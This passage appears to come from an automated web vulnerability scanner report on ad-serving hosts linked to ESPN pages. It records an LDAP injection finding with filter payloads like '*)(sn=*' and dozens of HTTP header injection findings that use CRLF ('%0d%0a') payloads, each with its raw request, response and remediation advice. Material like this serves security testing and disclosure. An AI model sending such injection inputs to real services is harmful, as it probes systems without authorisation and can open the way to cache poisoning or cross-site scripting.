s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 14:05:29 GMT Server: Omniture DC/2.0.0 xserver: www187 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Issue background
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
Request 1
GET /adj/SNET_homepage/*)(sn=* HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 343 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 14:33:39 GMT Expires: Sat, 06 Nov 2010 14:33:39 GMT Connection: close
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4a/0/0/%2a/y;212839894;4-0;0;34177316;1-468/60;38365271/38383028/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/roundtheworld.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_basketball.jpg" border=0 alt="Click here to find out more!"></a>');
Request 2
GET /adj/SNET_homepage/*)!(sn=* HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 332 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 14:33:39 GMT Expires: Sat, 06 Nov 2010 14:33:39 GMT Connection: close
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a4a/0/0/%2a/w;212839894;1-0;0;34177316;1-468/60;38365276/38383033/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/jigsaw.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_jigsaw.jpg" border=0 alt="Click here to find out more!"></a>');
4. HTTP header injectionpreviousnext There are 43 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5dad5%0d%0a1baec289168 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5dad5%0d%0a1baec289168/N2465.SD153321N2465SN0/B4809700.16 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5dad5 1baec289168/N2465.SD153321N2465SN0/B4809700.16: Date: Sat, 06 Nov 2010 14:31:08 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 25cca%0d%0a302ed7e955c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /25cca%0d%0a302ed7e955c/N3220.ESPN/B4924969.12 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/25cca 302ed7e955c/N3220.ESPN/B4924969.12: Date: Sat, 06 Nov 2010 14:31:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 944e8%0d%0a8629d5503b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /944e8%0d%0a8629d5503b3/N3220.ESPN/B4924969.13 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/944e8 8629d5503b3/N3220.ESPN/B4924969.13: Date: Sat, 06 Nov 2010 14:32:06 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2f04e%0d%0a991dea50141 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2f04e%0d%0a991dea50141/N3220.ESPN/B4924969.15 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2f04e 991dea50141/N3220.ESPN/B4924969.15: Date: Sat, 06 Nov 2010 14:32:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6940d%0d%0a0d42691d025 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6940d%0d%0a0d42691d025/N3220.ESPN/B4924969.16 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6940d 0d42691d025/N3220.ESPN/B4924969.16: Date: Sat, 06 Nov 2010 14:32:11 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b10d%0d%0aa22459ac167 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b10d%0d%0aa22459ac167/N3220.ESPN/B4924969.17 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7b10d a22459ac167/N3220.ESPN/B4924969.17: Date: Sat, 06 Nov 2010 14:32:15 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 787e0%0d%0a02a6684dba4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /787e0%0d%0a02a6684dba4/N3220.ESPN/B4924969.61 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/787e0 02a6684dba4/N3220.ESPN/B4924969.61: Date: Sat, 06 Nov 2010 14:32:16 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 31515%0d%0a8ed6132a227 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31515%0d%0a8ed6132a227/N3220.ESPN/B4924969.62 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31515 8ed6132a227/N3220.ESPN/B4924969.62: Date: Sat, 06 Nov 2010 14:32:29 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5b28f%0d%0a6491db27e37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5b28f%0d%0a6491db27e37/N3220.ESPN/B4924969.63 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5b28f 6491db27e37/N3220.ESPN/B4924969.63: Date: Sat, 06 Nov 2010 14:32:32 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3fe38%0d%0abb158bf3b84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3fe38%0d%0abb158bf3b84/N3340.espn.com/B4282150.59 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3fe38 bb158bf3b84/N3340.espn.com/B4282150.59: Date: Sat, 06 Nov 2010 22:53:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 967b4%0d%0a392f439ce08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /967b4%0d%0a392f439ce08/N4694.Beep01/B4850508.10 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/967b4 392f439ce08/N4694.Beep01/B4850508.10: Date: Sun, 07 Nov 2010 05:41:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 97c1a%0d%0a2c6a623140a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /97c1a%0d%0a2c6a623140a/N5364.vibrantmedia.com/B4832252.3 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/97c1a 2c6a623140a/N5364.vibrantmedia.com/B4832252.3: Date: Sun, 07 Nov 2010 01:11:17 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 4cf53%0d%0a74d41d2d621 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4cf53%0d%0a74d41d2d621/N5865.149077.ESPN/B4748231.11 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4cf53 74d41d2d621/N5865.149077.ESPN/B4748231.11: Date: Sat, 06 Nov 2010 14:32:37 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2ddc5%0d%0ac36c8930ac9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2ddc5%0d%0ac36c8930ac9/allb.tbd/front HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2ddc5 c36c8930ac9/allb.tbd/front: Date: Sun, 07 Nov 2010 05:41:57 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1075c%0d%0a9979249b2bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1075c%0d%0a9979249b2bf/x1.cont/espn/360/soccer HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1075c 9979249b2bf/x1.cont/espn/360/soccer: Date: Sat, 06 Nov 2010 14:32:47 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 62102%0d%0a9426b771d28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62102%0d%0a9426b771d28/N2724.ESPNBass/B4661944.101 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62102 9426b771d28/N2724.ESPNBass/B4661944.101: Date: Sat, 06 Nov 2010 14:32:57 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 85850%0d%0ab7d666d43dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /85850%0d%0ab7d666d43dc/N3175.153731.YAHOOINC.NETWORK-PR/B4640114 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/85850 b7d666d43dc/N3175.153731.YAHOOINC.NETWORK-PR/B4640114: Date: Sun, 07 Nov 2010 01:11:19 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 65135%0d%0a6b830c274ea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /65135%0d%0a6b830c274ea/N3220.ESPN/B4924969.15 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/65135 6b830c274ea/N3220.ESPN/B4924969.15: Date: Sat, 06 Nov 2010 14:32:59 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7c00e%0d%0a97c2f2680ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7c00e%0d%0a97c2f2680ae/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7c00e 97c2f2680ae/N3740.132309.BURSTMEDIA/B4366794.6: Date: Sun, 07 Nov 2010 01:11:19 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5b47c%0d%0a3682d44bafc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5b47c%0d%0a3682d44bafc/N4492.espn.com/B4156424 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5b47c 3682d44bafc/N4492.espn.com/B4156424: Date: Sat, 06 Nov 2010 14:32:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ddf2%0d%0a4e2fc26ae1d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ddf2%0d%0a4e2fc26ae1d/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5ddf2 4e2fc26ae1d/N6357.2489.ESPN.COM/B4629693.10: Date: Sat, 06 Nov 2010 14:33:05 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5dab8%0d%0a02e8772af9d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5dab8%0d%0a02e8772af9d/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5dab8 02e8772af9d/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38: Date: Sun, 07 Nov 2010 05:41:59 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 87709%0d%0a5cc45810845 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /87709%0d%0a5cc45810845/N3220.ESPN/B4924969.11 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/87709 5cc45810845/N3220.ESPN/B4924969.11: Date: Sat, 06 Nov 2010 14:33:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 232ab%0d%0a4ec2aaa41d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /232ab%0d%0a4ec2aaa41d5/N3340.espn.com/B4282150.59 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/232ab 4ec2aaa41d5/N3340.espn.com/B4282150.59: Date: Sat, 06 Nov 2010 22:53:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 665ec%0d%0a0ac58374054 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /665ec%0d%0a0ac58374054/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/665ec 0ac58374054/N3740.132309.BURSTMEDIA/B4366794.6: Date: Sun, 07 Nov 2010 01:11:21 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 89fec%0d%0a9060095bbb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89fec%0d%0a9060095bbb7/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/89fec 9060095bbb7/N6357.2489.ESPN.COM/B4629693.10: Date: Sat, 06 Nov 2010 14:33:27 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 58ca0%0d%0addbc95694e6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /58ca0%0d%0addbc95694e6/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/58ca0 ddbc95694e6/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38: Date: Sun, 07 Nov 2010 05:42:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5e317%0d%0a64a4f1f5193 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5e317%0d%0a64a4f1f5193/x1.cont/espn/360/soccer HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5e317 64a4f1f5193/x1.cont/espn/360/soccer: Date: Sat, 06 Nov 2010 14:33:35 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 22147%0d%0ae99d359900 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /22147%0d%0ae99d359900/N4694.Beep01/B4850508.10 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/22147 e99d359900/N4694.Beep01/B4850508.10: Date: Sun, 07 Nov 2010 05:42:55 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 85a71%0d%0a7d2d0e52669 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /85a71%0d%0a7d2d0e52669/allb.tbd/front HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/85a71 7d2d0e52669/allb.tbd/front: Date: Sun, 07 Nov 2010 05:42:27 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 4 is copied into the location response header. The payload 9844e%0d%0a6d1fad43f6c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/13465/13553/9844e%0d%0a6d1fad43f6c/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 65a62%0d%0a852639705e9 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; A2=dOCf9Kih035P0000820wrG; eyeblaster=BWVal=&BWDate=&debuglevel=65a62%0d%0a852639705e9; B2=6Niz0820wrG; u2=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; E2=035P820wrG; C3=0s9X820wrG0000002_; u3=1; D3=0s9X002H820wrG; C_8557=3615119;
The value of REST URL parameter 2 is copied into the Location response header. The payload f3394%0d%0a260e20407d2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
